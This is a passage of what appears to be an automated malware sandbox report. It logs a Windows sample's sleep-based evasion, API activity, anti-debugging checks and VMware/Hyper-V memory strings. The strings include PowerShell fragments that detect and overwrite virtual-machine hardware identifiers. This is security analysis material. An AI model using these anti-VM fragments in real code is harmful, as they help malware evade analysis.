                Source: C:\Windows\System32\WerFault.exeAPI coverage: 5.7 %
                Source: C:\Windows\System32\lsass.exeAPI coverage: 6.3 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 5.7 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.5 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.4 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 7.3 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
                Source: C:\Users\user\Desktop\wzcsapi.exe TID: 7520Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 6500Thread sleep count: 1767 > 30Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 6500Thread sleep time: -176700s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 3308Thread sleep count: 475 > 30Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exe TID: 3308Thread sleep time: -47500s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep count: 63 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep time: -63000s >= -30000sJump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 7204Thread sleep count: 8359 > 30Jump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 7204Thread sleep time: -8359000s >= -30000sJump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 7204Thread sleep count: 1640 > 30Jump to behavior
                Source: C:\Windows\System32\winlogon.exe TID: 7204Thread sleep time: -1640000s >= -30000sJump to behavior
                Source: C:\Windows\System32\lsass.exe TID: 7216Thread sleep count: 8352 > 30
                Source: C:\Windows\System32\lsass.exe TID: 7216Thread sleep time: -8352000s >= -30000s
                Source: C:\Windows\System32\lsass.exe TID: 7216Thread sleep count: 1584 > 30
                Source: C:\Windows\System32\lsass.exe TID: 7216Thread sleep time: -1584000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7368Thread sleep count: 245 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7368Thread sleep time: -245000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7344Thread sleep count: 58 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7344Thread sleep time: -58000s >= -30000s
                Source: C:\Windows\System32\dwm.exe TID: 7452Thread sleep count: 9875 > 30
                Source: C:\Windows\System32\dwm.exe TID: 7452Thread sleep time: -9875000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 2872Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7964Thread sleep count: 57 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7964Thread sleep time: -57000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7484Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7484Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7508Thread sleep count: 259 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7508Thread sleep time: -259000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep count: 162 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep time: -162000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7548Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7548Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7560Thread sleep count: 181 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7560Thread sleep time: -181000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7568Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7568Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7576Thread sleep count: 97 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7576Thread sleep time: -97000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7592Thread sleep count: 77 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7592Thread sleep time: -77000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7600Thread sleep count: 82 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7600Thread sleep time: -82000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7608Thread sleep count: 258 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7608Thread sleep time: -258000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7680Thread sleep count: 258 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7680Thread sleep time: -258000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7332Thread sleep count: 63 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7332Thread sleep time: -63000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7688Thread sleep count: 241 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7688Thread sleep time: -241000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep count: 85 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep time: -85000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7720Thread sleep count: 80 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7720Thread sleep time: -80000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7756Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7756Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7796Thread sleep count: 249 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7796Thread sleep time: -249000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7804Thread sleep count: 257 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7804Thread sleep time: -257000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep count: 258 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep time: -258000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep count: 34 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep time: -34000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep count: 256 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep time: -256000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7880Thread sleep count: 225 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7880Thread sleep time: -225000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7888Thread sleep count: 67 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7888Thread sleep time: -67000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 7900Thread sleep count: 66 > 30
                Source: C:\Windows\System32\svchost.exe TID: 7900Thread sleep time: -66000s >= -30000s
                Source: C:\Users\user\Desktop\r8k29DBraE.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\wzcsvc.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\wzcsvc.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F59E250 FindFirstFileExW,1_2_000002616F59E250
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819BE250 FindFirstFileExW,5_2_00000216819BE250
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1EE250 FindFirstFileExW,6_2_000001CA7D1EE250
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C0E250 FindFirstFileExW,8_2_00000265B3C0E250
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5E250 FindFirstFileExW,9_2_0000017D2DD5E250
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B92E250 FindFirstFileExW,10_2_0000022F4B92E250
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE272E250 FindFirstFileExW,11_2_0000013DE272E250
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CAE250 FindFirstFileExW,14_2_00000262F1CAE250
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E15E250 FindFirstFileExW,15_2_000002234E15E250
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B1E250 FindFirstFileExW,16_2_0000023942B1E250
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056DE250 FindFirstFileExW,17_2_000001EF056DE250
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD7E250 FindFirstFileExW,18_2_000002287AD7E250
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA9E250 FindFirstFileExW,19_2_000001B94DA9E250
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520257E250 FindFirstFileExW,20_2_000002520257E250
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFCE250 FindFirstFileExW,21_2_000001A9EBFCE250
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF163E250 FindFirstFileExW,22_2_0000019FF163E250
                Source: C:\Users\user\Desktop\wzcsapi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000
                Source: Amcache.hve.8.drBinary or memory string: VMware
                Source: svchost.exe, 00000017.00000002.2647565274.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1441428085.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                Source: svchost.exe, 00000017.00000000.1441428085.000002A769A42000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: VMware SATA CD00
                Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: svchost.exe, 00000012.00000000.1419840527.000002287A02B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: NECVMWarVMware SATA CD00
                Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.23.drBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                Source: WerFault.exe, 00000008.00000003.1585065018.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000003.1582411351.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000002.1587550148.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2645232189.0000013DE18BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2638457854.0000013DE182B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2688680497.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2691628090.000002234B50C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 0000000F.00000000.1408194310.000002234AE93000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                Source: svchost.exe, 00000017.00000000.1441998504.000002A76A110000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
                Source: Microsoft-Windows-Partition%4Diagnostic.evtx.23.drBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.23.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: System.evtx.23.drBinary or memory string: VMCI: Using capabilities (0x1c).
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: nonicNECVMWarVMware SATA CD00
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                Source: svchost.exe, 00000017.00000002.2671284175.000002A76A489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
                Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: svchost.exe, 00000017.00000002.2695585202.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
                Source: Microsoft-Windows-Ntfs%4Operational.evtx.23.drBinary or memory string: VMware
                Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.23.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: storahciNECVMWarVMware SATA CD00
                Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
                Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: wzcsapi.exe, 00000003.00000002.2666839520.000000001B7B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1361992050.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2642522725.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1366665069.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2633046852.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2632826106.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1416668793.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.1419893640.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2642135506.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2632168691.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1425374229.000001B94D436000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.drBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
                Source: svchost.exe, 0000000F.00000002.2689169832.000002234AEAD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.23.drBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
                Source: WerFault.exe, 00000008.00000002.1587829124.00000265B499F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: WerFault.exe, 00000008.00000003.1585065018.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000003.1582411351.00000265B459F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000008.00000002.1587550148.00000265B459F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ
                Source: svchost.exe, 0000001E.00000002.2635078292.000002517802B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.23.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                Source: svchost.exe, 00000022.00000000.1503370869.00000297A5600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: lsass.exe, 00000009.00000003.1482822792.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                Source: svchost.exe, 0000000A.00000002.2633046852.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
                Source: svchost.exe, 00000017.00000003.1476150275.000002A76AD8D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                Source: dwm.exe, 0000000E.00000002.2698819352.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: C:\Users\user\Desktop\wzcsvc.exeAPI call chain: ExitProcess graph end nodegraph_4-8463
                Source: C:\Users\user\Desktop\wzcsvc.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
